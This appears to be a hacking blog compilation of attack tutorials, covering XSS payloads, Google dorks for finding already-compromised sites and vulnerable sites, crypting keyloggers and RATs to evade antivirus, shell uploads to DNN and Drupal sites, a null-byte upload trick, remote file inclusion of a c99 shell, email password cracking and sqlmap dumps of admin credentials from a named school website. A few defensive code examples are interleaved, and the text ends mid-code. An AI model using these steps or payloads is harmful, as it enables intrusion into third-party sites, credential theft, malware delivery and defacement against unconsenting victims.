Sunday 25 May 2014

CROSS SITE SCRIPTING XSS tut

Simply put, cross site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non persistent" XSS.

Non Persistent XSS

Non persistent, as the title suggests, means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic coded search engine for a site. Say, for example, the site search script is in this format:

Site.com/search.php?search=text here

Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

This simply echoes your search string straight onto the page without performing any validation checks. What if we were to alter the search string to display HTML or JavaScript? For example:

Site.com/search.php?search=XSS
Site.com/search.php?search=alert("XSS";

If no sanitization checks are being performed by the search script, this will just be echoed straight onto the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used to display anything you want. However, since the attacker can only display code on their own pages, this isn't much of a threat to other users. Although if the string was turned into hex, the search string may be slightly more hidden and with a little deception could be used to trick users into thinking the link is legitimate. Next there's persistent XSS.

Persistent XSS

Again as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent attacks are injected permanently into the code of the site, so anyone who views the site will be able to see it permanently. In order for these to work, the code has to be made to store itself on the site's server somehow, which can be hard to find.

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users (fixed now, obviously) affecting the page blog.php. The register process wasn't sanitized at all, so all a user had to do was simply put redirection code. This was an obvious vulnerability which should have been spotted from the beginning, but just like XSS on other sites it was missed. If not fixed, this vulnerability would affect index.php as well as the forums and anywhere where the code was displayed on the site. A good place to look out for this vulnerability is basic forum scripts that site owners have made themselves or found off sites designed to help novices.

With both of these attacks, it is also possible to run malicious code from another site, again making the possibilities of attack endless. JavaScript has a lot of features that are not well known, such as changing the images on sites from images[number].src, and anyone who uses MySpace will know that CSS can be used to remove or replace certain sections of a site based on name. If you have a permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off another site:

Getting Past Basic Protection

So what if a site owner knows about XSS, but has provided some but very little protection against it? Well, this is where CharCode comes in. Char code is basically just a simple form of character encoding that can encode blocked characters so they get past the protection but still get displayed normally on the page. Here is a very common one that will pop up alerts saying "XSS" if it is vulnerable:

';alert(String.fromCharCode(88,83,83))//'; alert(String.fromCharCode(88,83,83))//"; alert (String.fromCharCode(88,83,83))//"; alert (String.fromCharCode(88,83,83))//-->">'> alert(String.fromCharCode(88,83,83))

This is a very useful XSS to know, as it provides more than one type of attack at once. If you get only one or two alerts, you know that only one or two of them work, so you need to try to eliminate some of them to test which one is affecting the site. The CharCode for "X" is 88 and "S" is 83. As you can see, each provides a slight variation to try to beat character blocking.

XSS could also be hidden in a non-existent image. This code below would run malicious JavaScript disguised as an image:

What if quotes are blocked? No problem, just inject the site like so:

The " will be interpreted in html as a " so the code will run fine. The next one below is very likely to work if you find a site is vulnerable.
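From the site owner's side, the search page described above stops being injectable once the term is HTML-encoded at the point of output. The following is an added example, not code from this post or from any site it mentions; the template, function names and sample query strings are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Hypothetical results template: the term lands in element text and in an
# attribute value, the two places a search page usually echoes it.
TEMPLATE = '<h1>Results for {term}</h1>\n<input name="search" value="{term}">'

# Constructed sample query strings (kept free of ';' so every Python
# version splits them the same way).
PROBES = [
    "search=text+here",
    "search=%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E",
    "search=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C%2Fscript%3E",
]


def get_term(query_string):
    """Return the decoded 'search' parameter (parse_qs undoes %XX encoding)."""
    return parse_qs(query_string, keep_blank_values=True).get("search", [""])[0]


def render_unsafe(query_string):
    """What the search script in the text does: echo the term as-is."""
    return TEMPLATE.format(term=get_term(query_string))


def render_safe(query_string):
    """Encode & < > " ' at output time, so the term is always inert text."""
    return TEMPLATE.format(term=html.escape(get_term(query_string), quote=True))


class _TagCollector(HTMLParser):
    """Records which tags a browser-like parser would see in the page."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and self.input_value is None:
            self.input_value = dict(attrs).get("value")


def parse_page(markup):
    """Return (list of start tags, value attribute of the first <input>)."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.input_value


if __name__ == "__main__":
    for qs in PROBES:
        print(qs)
        print("  unsafe tags:", parse_page(render_unsafe(qs))[0])
        print("  safe tags:  ", parse_page(render_safe(qs))[0])
```

Because the encoding happens after the parameter has been decoded, hex or percent-encoding of the link makes no difference to the result.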

Hackers use this google dorks and hack site automatically using shells

Hackers often use this shell and hack sites using the online hack mechanism powered by Google. Use one of the following Google dorks to find the shell:

intitle:index of/sh3llZ
"Index of /sh3llZ"
"/sh3llZ/uploadshell/ uploadshell.php"

This will show the list of sites that have a sh3llZ folder. Probably, there will be a link to a c99 shell. If you click the link, it will land you in a shell page. Using that shell, you can upload your own shells or deface the sites.

More Shells :

100% FUD Crypters for Keylogger and RATS

100% FUD Crypters for Keyloggers and RATs So now i will teach u guys how to make ur keyloggers and rats Undetectable by antivirus so lets just begin What are Crypters and what is FUD??? Well, I won't extend this topic over here, as I will explained all things about crypters in my articles #jxt chillax, Put Ya Mind 4 Groud# #l0l Ok letx Go :- Steps. How to use FUD crypter??? i have tried this Fud crypter and found it working perfectly and i hope it will work well for u as well 1.Download [= http://www.ziddu.com/ download/14444550/ XPROTECTCRYPTER_By_TRICKS4INDYA.rar.html] FUD Crypter Software Here to bypass antivirus. 2. Run crypter on your computer to see: 3. Hit on Browse and select the Decay logger server you have created (I WILL POST HOW TO CREATE A SERVER AFTER ). Again, hit on second Browse button and select the msc2.exe stubfile from downloaded folder. Select type of encryption like Xor, Rsa, etc. as you want. Now, hit on Crypt and select the path where you want to save the crypted FUD server. 4. You will find the crypted FUD server created at required destination. Now, bind this crypted keylogger server with any .exe file using Iexpress Binder software and send it to your victim to get the required email passwords from victim computer dpending on What information u want to get. You don't have to worry about victim antivirus as the crypted server will not be detected by any antivirus. I have posted the scan results below: Scan result before crypting: Scan result after Crypting: Note :s ince this crypter is public, it will remain FUD for not more than 2-3 days. So, use this crypter the earliest. The best way is to get the best hacking software -Winspy Keylogger, which is FUD (Fully UnDetectable). This is personally recommended keylogger

How to deface a pbnl site member.index works on only sites with post.php trendingphp and unprotected topic.php

To redirect a pbnl site with post.php or without protected topics.php, either to your site or to your deface page. you need to do the following...visit any pbnl site,login then create a new post with anything. I mean put anything in the content and the title,then open that post you created look @the address bar you will see something like this " www.site.tk/forum /showtopic.php?id=any number(e.g =31), write down that number,then create a new post in the forum again, IN THE TITLE OF THE NEW POST PUT THIS BELOW CODES. u can as wel change the URL to ur own site. while in the content put this below codes then to finally complete your hacking visit this link : www.site.tk/forum/post.php? action=update&tid=id of your second post which will be =32 NOTE:i told you to create a post first of all with anythin which i said write down the id, if the id of the first post you created is 31 then the id of the new one you created will be 32. DOWNLOAD THE TOPIC.PHP Below 2 protect ur site. N0TE: The topic.php allows only ur admins to create thread,add music, upload,e.t.c. It also rejects shells to be uploaded in avatars folders as pics.

FREE BEST HACKING SOFTWARES YOU NEED TO HAVE AS A HACKER

Best Free Hacking Software and Tools List

There are plenty of tools floating round the internet which claim to be the most effective in their fields. I have used several hacking tools that are designed for Windows and Linux operating systems and have seen that the Linux tools are way more powerful than the Windows tools. Keeping this factor in mind, I decided to compile my own list of the best free hacking software. Here is the list of best free hacking software:

NMAP | Best Free Hacking Tool

NMAP is by far the best security scanning and hacking tool ever created. This software is at the top of every list of hacking software for 2 reasons. Firstly, its ease of use and secondly, its wide usage. It provides a large variety of options like port scanning, fingerprinting, OS detection, ping, scanning, alive hosts detection, etc. It's an amazing command line tool for advanced users, who can combine many commands to execute at once. It's the most recommended tool for beginners as well as advanced learners and security specialists.

SUPERSCAN

Powerful protocol port scanner, pinger, resolver. If you want an alternative to Nmap on Windows with a decent interface, I recommend you check this out, it's pretty nice. It provides a cool scanning experience with a heap of data displayed.

CAIN AND ABEL

My personal favorite for cracking of any kind. Cain & Abel is a recovery tool for Microsoft operating systems. It permits simple recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords, brute-force and cryptanalysis attacks, recording VoIP conversations, revealing hidden boxes, uncovering cached passwords and analyzing routing protocols. The program doesn't exploit any software vulnerabilities or bugs that could not be fixed with very little effort.

JOHN THE RIPPER

This is my personal favorite cracking software. It has been around for over a decade and has evolved into a strong tool, thanks to the special effort of the open source community. John the Ripper is a fast password cracker, presently available for several operating systems. Its primary purpose is to detect weak operating system passwords.

NESSUS SECURITY SCANNER

This tool has been the simplest tool for both network admins and hackers, thanks to its wide implementation. The Nessus vulnerability scanner is the world leader in active scanners, and includes high-speed discovery, configuration auditing, quality identification, sensitive information discovery and vulnerability analysis of your security infrastructure.

WIRESHARK

Wireshark is a network protocol analyzer, or sniffer, that helps you to capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for UNIX and to give Wireshark features that are missing from closed-source sniffers. It works nicely on both UNIX systems and Windows (with a GUI), is simple to use and can reconstruct TCP/IP streams!

LIVE BULK MAILER

Live bulk mailer has the flexibility to still deface the spam filter of Gmail, Hotmail and Yahoo. It's an email flooding tool that permits the hacker to send a desired number of bulk mails to the victim inbox and flood it utterly. This could be a difficult task and might place you into problems, therefore before attacking via this tool don't forget to use a proxy server to cover your IP address.

WEBSITE DIGGER

Website digger is a tool that helps you to dig into a website and gain data concerning the host by applying whois queries, and it also has banner grabbing capability.

How to Hack Email Using Google

Hacking a Gmail,Yahoo, Hotmail emails using Google [Image: hacker.gif] To get success remeber this rule of hash technique TRY,Try and try Biggrin HELLO GUYS today i will show u how to hack gmail yahoo etc accounts very easily. I have seen the those people who want to hack someones email accounts spend their lots of time on searching but found nothing.Most of noob hackers try to hack someone with phishing attack but phishing is also one of the most hideous technique on Mail Hacking. But today i am going to show you a very new method which is called hash technique. So lets just begin 1. open http://www.google.com 2. now paste this code in the search bar and hit enter (1) ext :s ql (ii) intext :@ hotmail.com [change @ hotmail.com to any mail provider e.g intext :@ gmail.com] (iii) intext:e10adc3949ba59abbe56e057f20f883 e 3. Choose Among any of d three options Dork above and search 4 it via Google Now click on any of the displayed page 4. After clicking you will se these hashes along with the emails 5. copy any hash code Eg ( 127359f404a2b735 de9ba1336c66f480) and go to ONLINE MD5 HASH DECRYPTER and paste the hash code and click descrypt hash After 2-3 seconds it willgive u the password if found. Some emails wont work they hve changed their passwords or the hash code result is null I hope that u will enjoy this tutorial thanks and like us on facebook. If the above site dont work try these sites MD5ENCRYPTI0N http://md5rainbow.com http://md5online.org Note This is illegal and only for educational purpose

HACKING WEBSITES USING DNN PORTAL HACKING

HACKING WEBSITES USING DNN PORTAL HACKING Google Dorks 1- inurl:"/portals/0" 2- inurl:/tabid/36/ language/en-US/ Default.aspx You can also modify this google dork according to your need & requirement Here is the exploit Providers/ HtmlEditorProviders/Fck/ fcklinkgallery.aspx Step 1 : http://www.google.com Step 2: Now enter this dork :inurl:/tabid/36/language/ en-US/Default.aspx this is a dork to find the Portal Vulnerable sites, use it wisely. Step 3: you will find many sites, Select the site which you are comfortable with. Step 4: For example take this site. http://www.abc.com/ Home/tabid/36/Lan...S/ Default.aspx Step 5: Now replace /Home/tabid/36/Language/ en-US/Default.aspx with this /Providers/ HtmlEditorProviders/Fck/ fcklinkgallery.aspx Step 6: You will get a Link Gallary page.So far so good! Step 7: Dont do anything for now,wait for the next step... Step 8: Now replace the URL in the address bar with a Simple Script javascript:__doPostBack ('ctlURL$cmdUpload','' Step 9: You will Find the Upload Option Step 10: Select Root Step 11: Upload your package Your Shell c99,c100 , Images, etc After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have & upload here. Now Go to main page and refresh. you have seen hacked the website. DONE..!!

HOW TO HACK A WEBSITE USING AN ANDROID PHONE

Hello guys, today we talk about how to hack a website using your Android phone. We know that in the world 70% of websites are hacked by using SQL injection. To automate SQL injection we need tools or an OS: BackTrack, Havij or Kali, etc. But now you can attack a site using your Android mobile phone and tablets and hack the website. You only need 3 things:

1 - SQL vulnerable site
2 - Android mobile
3 - DroidSQLi tool

DroidSQLi is the first automated MySQL injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks. DroidSQLi supports the following injection techniques:

*.Time based injection
*.Blind injection
*.Error based injection
*.Normal injection

It automatically selects the best technique to use and employs some simple filter evasion methods.

#THIS TUTORIAL IS FOR THOSE WHO ALREADY KNOW HOW TO CARRY OUT A SQLI ATTACK WITH ANY AUTOMATED SQLI TOOLS.

HOW TO HACK A YAHOO ID USING BRUTE OR BRUTUS FORCe

TODAY I WILL SHOW YOU HOW TO HACK YAHOO IDS BY BRUTE FORCE ATTACK.. Step 1: Download Brutus Force by searching it on google then Extract it on desktop and lets start/ ok run it Step 2: To hack email in target bar write pop.mail.yahoo.com Step 3: Type : POP3 Step 4: Put connections to 60 and timeout to 60 Step 5: Make sure you check a ''Single User'' Step 6: Then when you check that to single user write in that bar you victims yahoo acc ID / explanation .. like hackerpilu@yahoo.com his ID will be hackerpilu.. write that Step 7: Password mod put on: ''Brute Force'' Step 8: Then click ''Range''(a new window will pop up) Step 9: Then make sure you put ''Min Length'' 6 and ''Max Length'' to 16 Step 10: Then put custom range .. or anything default as you want. Step 11: Click OK And for end click Start .. that's all .. now wait for the process to complete..ENJOY!! Note:for educational purpose only

HOW TO REDIRECT A VULN PBNL WEBSITE INDEX:PHP

This simple method can redirect d index.php of a PBNL WEB dat is using TRENDING MUSIC,TRENDING VIDEO, E.T.C LETS GET DOWN.... Firstly Register @ d site, then login and type in ur address bar www.sitename.com/music/ upload.php or www.sitename.com/movies/ upload.php. When it opens, write in the music title in the link write www.fileshare.website.tl/ delta.mp3 leave d image empty and put in the comment and click ADD, if d site is vuln. It will redirect d index.... NOTE THAT THE SITE MUST HAVE TRENDING MUSIC OR TRENDING "what you're adding"...

IMCE Dir Exploit for Hacking Drupal Websites

UsingIMCE directory exploitwe can upload our shells on websites which are made using DRUPAL platform and execute our shells and hence can easilyhack the websitesor simply say we can deface that website using thatloophole. Actually let me provide you more information about this Drupal FileBrowser bug. IMCE directory opens the file browser of the website from where you can upload images to your websites, so guy for uploading your shells you need to rename your shells like say c99.php to c99.png or r60.php to r60.png etc.. Now lets learn how to deface website or hack website using this bug: 1. First of all open the Google andthen type the below query in search box: inurl:"/imce?dir=" 2. Now search results will appear like below: 3. Now open the links like mentioned below: www.arcireal.com/imce?dir=imagecache/ dettaglio 4. Now a File browser will open which will allow you to upload and navigate though files: 5. Now upload the shell by clicking on upload button. 6. Access the shell by double clicking on that. 7. Rest things you already know.. Note: This is only for educational purposes. Any misuse is not the responsibility of HackingLoops orme.

HOW TO UNLOCK WINDOWS PASSWORD

Q) Where are Windows passwords saved?
A) Windows first encrypts the password using some algorithm and then saves it to a SAM file. This SAM file is locked and no user account, including the administrator, can use this file. This file is located in windows/system32/config.

Q) What is the above link?
A) The link given above is the download link for “Hiren's Boot CD”. It is a special type of **live cd** bundled with popular and useful Windows password unlocker tools. The link is to Hiren's Boot CD 15.1, but you can download any earlier version. The main reason for choosing this CD is that it contains a number of useful programs. There are many other live CDs too; you can even try them.

Q) What is a **live cd**?
A) A live CD is a CD/DVD or any other portable media containing a bootable operating system. These media have the unique ability to run an operating system without altering the files and operating system installed on the hard disk of the PC. It generally places its files in the RAM [random access memory, volatile memory], so when a PC is rebooted all its files are deleted automatically.

Q) How does this CD help us?
A) Since this live CD doesn't use the pre-installed operating system, we can edit/delete its files [even the locked ones, i.e. the SAM file]. You can also use utilities present on this CD to change the Windows password.

Steps:-
1) Download the zip file from the above link.
2) Extract it.
3) There will be a .iso file. Burn that file to CD using Nero/PowerISO or any other software you have.
4) Boot using this CD, i.e. insert this CD in the CD-ROM and restart [make sure that the CD-ROM has the highest boot priority].
5) After booting, it will show a menu. Choose “Mini windows xp”. It will take some time to launch.
6) After it is finished, you will have a Windows classic style desktop.
7) Click on Start >> Hiren boot cd menu [HBCD menu].
8) It will open a dialogue box. Click on “Menu” >> click on “password and keys”; there you will have a list of programs. Click on “Password renew”.
9) Now click on select target, browse to your Windows directory, i.e. “c:\windows”, and press OK.
10) Click on “Renew existing user password” and then choose your user account.
11) Enter the desired password and hit install.
12) You are now done. Just restart your PC and log in using your new password.

Prevention: Set the least boot priority for the CD-ROM and set a password at BIOS setup. This way the BIOS won't boot from the CD and the operating system will not load.

SQL INJECTION |Website Deface | Usingtool |

What is SQL injection?

SQL stands for Structured Query Language. SQL is used to design databases. The information is stored in databases. SQL injection is a vulnerability occurring in the database layer of an application which allows an attacker to see the contents stored in the database. This vulnerability occurs when the user's input is not filtered or is improperly filtered. The main goal of the attacker is to access the information stored in the website's database. It can be done manually, read more here. In this tutorial, I am going to do the same thing easily using a tool. Read the disclaimer first before proceeding. I remind you again that it's only for educational purposes.

Requirement: Download the tool from here. It's SqliHelperV.2.1.

Steps of attack :- Vulnerable Website > Database > Tables > Columns > Data

Search for any vulnerable website using Google dorks. I found this website http://www.shelter.org/ org/ news.php?id=5. I came to know it's vulnerable because when I attached a single quote at the end, it didn't filter it and returned me an error. http:// www.shelter.org/ org/news.php?id=5'

Step 1: Run the tool; there is no need for any installation. Input the vulnerable URL and click on 'Inject'.
Step 2: After processing is done, click on "Get Database". It will then show the databases.
Step 3: Select any database other than "Information_schema" and click on "Get tables". It will start fetching all tables. Have some patience. In most cases there is a table like admin or login or users etc.
Step 4: Select any table and click on "Get Columns".
Step 5: Select the column and click on "Dump Now". A new pop-up window will open showing you the data stored in it.

Try the same thing manually to practice your skills.

So you came to know how deadly it could be to allow users to send their input without any filtration/validation. So never be lazy at programming and use possible filtration mechanisms.
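The closing advice, shown in code for a page like news.php?id=5: validate the id and bind it as a parameter instead of building the query from a string. This is an added example, not code from this post or from the site it names; the table, rows and function names are constructed, and SQLite stands in for the site's database.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's news table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(5, "Shelter opens new wing"), (6, "Winter fundraiser")],
    )
    return db


def get_news_unsafe(db, raw_id):
    """String concatenation: the id parameter becomes part of the SQL text."""
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def get_news_safe(db, raw_id):
    """Validate first, then bind: the value can never change the statement."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []  # not a plain integer: treat as "no such article"
    return db.execute(
        "SELECT id, title FROM news WHERE id = ?", (int(raw_id),)
    ).fetchall()


def attempt(fn, db, raw_id):
    """Run one lookup and report rows or the database error it triggered."""
    try:
        return ("rows", fn(db, raw_id))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


# Constructed request values: a normal id, the single-quote check described
# in the text, and a condition appended to the id.
SAMPLES = ["5", "5'", "5 OR 1=1"]

if __name__ == "__main__":
    db = make_db()
    for raw in SAMPLES:
        print(repr(raw))
        print("  unsafe:", attempt(get_news_unsafe, db, raw))
        print("  safe:  ", attempt(get_news_safe, db, raw))
```

The database error on the trailing quote is the signal the text describes; with validation and binding the same input yields an empty result and no error to observe.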

NETWORK HACKING

Network hacking generally means gathering information about a domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc. It also includes OS fingerprinting, port scanning and port surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol), which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not. To ping a particular host the syntax is (at command prompt)--

c:/>ping hostname.com

example:- c:/>ping www.google.com

Various attributes used with the 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.

Netstat :- It displays protocol statistics and current TCP/IP network connections, i.e. local address, remote address, port number, etc. Its syntax is (at command prompt)--

c:/>netstat -n

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on a particular port. When connected it grabs the daemon running on that port. The basic syntax of Telnet is (at command prompt)--

c:/>telnet hostname.com

By default telnet connects to port 23 of the remote computer. So, the complete syntax is-

c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21

Tracert :- It is used to trace out the route taken by certain information, i.e. data packets, from source to destination. Its syntax is (at command prompt)--

c:/>tracert www.hostname.com

example:- c:/>tracert www.site.com

Here "* * * Request timed out." indicates that the firewall installed on that system blocks the request and hence we can't obtain its IP address. Various attributes used with the tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt. The information obtained by using the tracert command can be further used to find out the exact operating system running on the target system.

phpFox (ajax.php) XSS Vulnerability

PhpFox is a Php Script For Making Social Networking website, Similiar to Facebook. 3.1 and some other versions of PhpFox are vulnerable For XSS. Google Dork : "intext:© · English (US) Powered By phpFox Version 3.0.1." "inurl:/static/ajax.php?core" Open any website for search results with text :© · English (US) Powered By phpFox Version 3.0.1 or url xyz.com/static /ajax.php?core now You'll Get something Like This URL give below http://www.ursite.com/static / ajax.php?core[ajax]=true&core [call]=core.message&height=150&width=300 &message=

CMS SITE VULN TUT::::::

Go to google search dis Dork : "inurl:wp-content/themes/GeoPlaces/" DATE: 2/6/2013 To upload shell Site.com/wp-content/themes/GeoPlaces /monetize/ upload/ To Find ur Shell Site.com/wp-content/uploads/2013/08 Replace the Date when u upload

SQL STEP BY STEP TUTORIAL

Today we will learn how to operate the "best SQL injection exploiting tool" i.e SQLMAP its a python tool , and it is preloaded in almost every Back Track versionfirst of allwe need a vulnerable target!here it is http:// www.alliedschools.edu.pk/main_news.php ? news_id=52 ok first step is to fatch the databases command will be like this one python ./ sqlmap.py -u http:// www.alliedschools.edu.pk/main_news.php ? news_id=52 --dbshere:- -u is stand for which is vulnerable to SQL injection and --dbs is used for fatching total databases in website ok after completing the process of fataching the databases it will something like that available databases(8) *.informtion_schema *.alliedschools_web now we are going to expoit database alliedschools_web and fatch the tables present in it XDok command will change a little bit :p ython ./sqlmap.py -u http:// www.alliedschools.edu.pk/main_news. php? news_id=52 -Dalliedschools_web -- tableshere :- -D and then name of the database from which we want to fetch tables and --tables is for fatching total table present in the database after processing we will get the tables present in database "alliedschools_web" after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus ...... ...... now we are going to fatch the cloumns from table admin of database alliedschools_campus command is :- python ./ sqlmap.py -u http:// www.alliedschools.edu.pk/main_news. php? news_id=52 -Dalliedschools_campus -T admin --columns now we will get something like this Database: alliedschools_campus Table : admin [12 columns ] admin_password admin_username admin_email ...... ...... This is the last command to get the admin username and password command is python ./sqlmap.py -u http:// www.alliedschools.edu.pk/main_news. php? 
news_id=52 -Dalliedschools_campus -T admin -Cadmin_password, admin_username --dump and after finishing process we will get something like that Database: alliedschools_campus Table : admin [6 entries] admin_password admin_username $erver admin ...... ...... Now You Have admin Password of website, Find admin panel and hun hun (DO WHATEVER U LYK AS 4 ME I DID WHATEVA I LYK WITH AFRICANEX.COM AND SYMN.NET AND MUCH M0RE WITH DIZ TUT0RIAL)...xD

The Null Byte Hack : Extreme HacK for sites which have uploading avtar and picture Facility

Many web forums have mushroomed on the internet and they are set up in a jiffy, so they won't pay much attention to security. An older exploit I am discussing here is the Null Byte exploit. Almost all forums include a picture and avatar uploading system where you can upload your user signatures and avatars. At first look it looks like a normal uploading system, but it's a way to upload our own files into the forum, or to get into the admin area and literally “OWN” the forum. However, as this hack is outdated as of now, most have deployed some form of input sanitization to prevent such an attack. Nevertheless, thousands of vulnerable forums do exist even now, with even some bigger names among them.

How to exploit it?

In order to exploit this vulnerability, you must input “% 00” (with or without space as the case arises). Now a lot of you are probably asking what the heck it is? Ah well.. it's the encrypted version of NULL. It's just the same as we used to exploit the null session in Windows systems.

Now, whenever you upload a file, you will be asked to specify the directory where the file is located. Each file has a particular extension to signify the kind of file it is. Now what if we can input the “% 00” at the end of the file? The way most forums keep bad files in control and out of the forum is by restricting certain extensions such as .exe, .php etc. But if we can modify the file and trick the server into thinking that it's something else.. For example:

C:webrootc99.php% 00.jpg

Now when we do this, the operating system will read the file to be uploaded as a PHP file, but the forum server will read it as a .jpg (image) file. And when this happens, you will exploit it to get and upload your files on the server, and if you are a bit creative, you can access the admin area too.

IF YOU LIKE MY POST REPLY!
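For forum owners, the mismatch described above (the extension check sees ".jpg", the file API stops at the NUL) goes away when the upload handler rejects control characters, checks the file's leading bytes and never reuses the client's filename. This is an added example, not code from this post or from any forum package; the function names, the allowlist and the sample filenames are constructed for illustration.

```python
import os
import secrets
from urllib.parse import unquote

# Allowed avatar types and the magic bytes each file must start with.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def naive_accepts(filename):
    """The weak check from the text: only the end of the name is inspected."""
    return filename.lower().endswith(tuple(ALLOWED))


def c_string_view(filename):
    """What a NUL-terminated file API would see after URL decoding."""
    return unquote(filename).split("\x00", 1)[0]


def safe_store_name(filename, content):
    """Return a server-generated name for the upload, or raise ValueError."""
    decoded = unquote(filename)
    if "%" in decoded:
        raise ValueError("nested percent-encoding in filename")
    if any(ord(ch) < 32 or ch in "/\\:" for ch in decoded):
        raise ValueError("control character or path separator in filename")
    ext = os.path.splitext(decoded)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        raise ValueError("extension not allowed")
    if not content.startswith(magic):
        raise ValueError("content does not match extension")
    # The client-supplied name is discarded; only the vetted extension is kept.
    return secrets.token_hex(16) + ext


def is_accepted(filename, content):
    """Boolean wrapper around safe_store_name for quick checks."""
    try:
        safe_store_name(filename, content)
        return True
    except ValueError:
        return False


# Constructed sample uploads: (filename as sent, first bytes of the body).
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SCRIPT = b"<?php /* constructed placeholder body */ ?>"
SAMPLES = [
    ("me.jpg", JPEG),
    ("avatar.php%00.jpg", SCRIPT),
    ("avatar.php%2500.jpg", SCRIPT),
    ("notes.php.jpg", SCRIPT),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        print(name, "| naive:", naive_accepts(name),
              "| file API sees:", repr(c_string_view(name)),
              "| hardened:", is_accepted(name, body))
```

Serving the avatar directory with script execution disabled is the complementary control, since it covers any file that slips past the name checks.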

EASY WAY TO HACK a SITE USING GOOGLE dORKS

Go to ur adress bar and visit dis link to get a high number of dorks to use for this tutorial http://pastebin.com/uTS5BKaB vlunarable site maybe site.com/index.php?p age=home To chek www.targetsite.com/index.php?p age= www.google.com go to any host creat and account upload shell @ public_html then make sure tz in .txt(?) add sure B http://www..com /v2/index.php?page=http:// www.tatata.hostingsite.com/c99.txt ? then u can access ur shell

Intrusion DetectionSystem (IDS)

An intrusion detection system (IDS) is a software and/or hardware-based system that monitors network traffic for suspicious activity and alerts the system or network administrator. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network.

Typical locations for an intrusion detection system are shown in the following figure.

The types of intrusion detection systems are:

1) Host-Based Intrusion Detection System (HIDS): Host-based intrusion detection systems, or HIDS, are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity.

2) Network-Based Intrusion Detection System (NIDS): These IDSs detect attacks by capturing and analyzing network packets. Listening on a network segment or switch, one network-based IDS can monitor the network traffic affecting multiple hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console.

Some important topics that come under intrusion detection are:

1) Signatures - A signature is the pattern that you look for inside a data packet. A signature is used to detect one or multiple types of attacks. For example, the presence of "scripts/iisadmin" in a packet going to your web server may indicate intruder activity. Signatures may be present in different parts of a data packet depending upon the nature of the attack.

2) Alerts - Alerts are any sort of user notification of intruder activity. When an IDS detects an intruder, it has to inform the security administrator about this using alerts. Alerts may be in the form of pop-up windows, logging to a console, sending e-mail and so on. Alerts are also stored in log files or databases where they can be viewed later on by security experts.

3) Logs - The log messages are usually saved in a file. Log messages can be saved either in text or binary format.

4) False Alarms - False alarms are alerts generated due to an indication that is not intruder activity. For example, misconfigured internal hosts may sometimes broadcast messages that trigger a rule, resulting in generation of a false alert. Some routers, like Linksys home routers, generate lots of UPnP related alerts. To avoid false alarms, you have to modify and tune different default rules. In some cases you may need to disable some of the rules to avoid false alarms.

5) Sensor - The machine on which an intrusion detection system is running is also called the sensor in the literature because it is used to "sense" the network.

Snort: Snort is a very flexible network intrusion detection system that has a large set of pre-configured rules. Snort also allows you to write your own rule set. There are several mailing lists on the internet where people share new Snort rules that can counter the latest attacks. Snort is a modern security application that can perform the following three functions:

* It can serve as a packet sniffer.
* It can work as a packet logger.
* It can work as a Network-Based Intrusion
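The signature, alert and false-alarm ideas above can be seen working together in a small sketch. This is an added example, not part of the original post and not Snort's rule language or code; the rule ids, addresses and sample packets are constructed for illustration.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote_to_bytes


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes


@dataclass(frozen=True)
class Rule:
    sid: int                      # rule identifier (made up for this example)
    msg: str                      # text written to the alert log
    content: bytes                # signature: lowercase bytes to find in the payload
    dport: Optional[int] = None   # None matches any destination port


RULES = [
    Rule(1001, "IIS admin path requested", b"scripts/iisadmin", dport=80),
    Rule(1002, "UPnP discovery broadcast", b"m-search * http/1.1", dport=1900),
]

# Constructed traffic (documentation and private address ranges).
SAMPLE = [
    Packet("203.0.113.7", "192.0.2.10", 80, b"GET /scripts/iisadmin/default.htm HTTP/1.0\r\n\r\n"),
    Packet("203.0.113.9", "192.0.2.10", 80, b"GET /Scripts/%69isadmin/ HTTP/1.0\r\n\r\n"),
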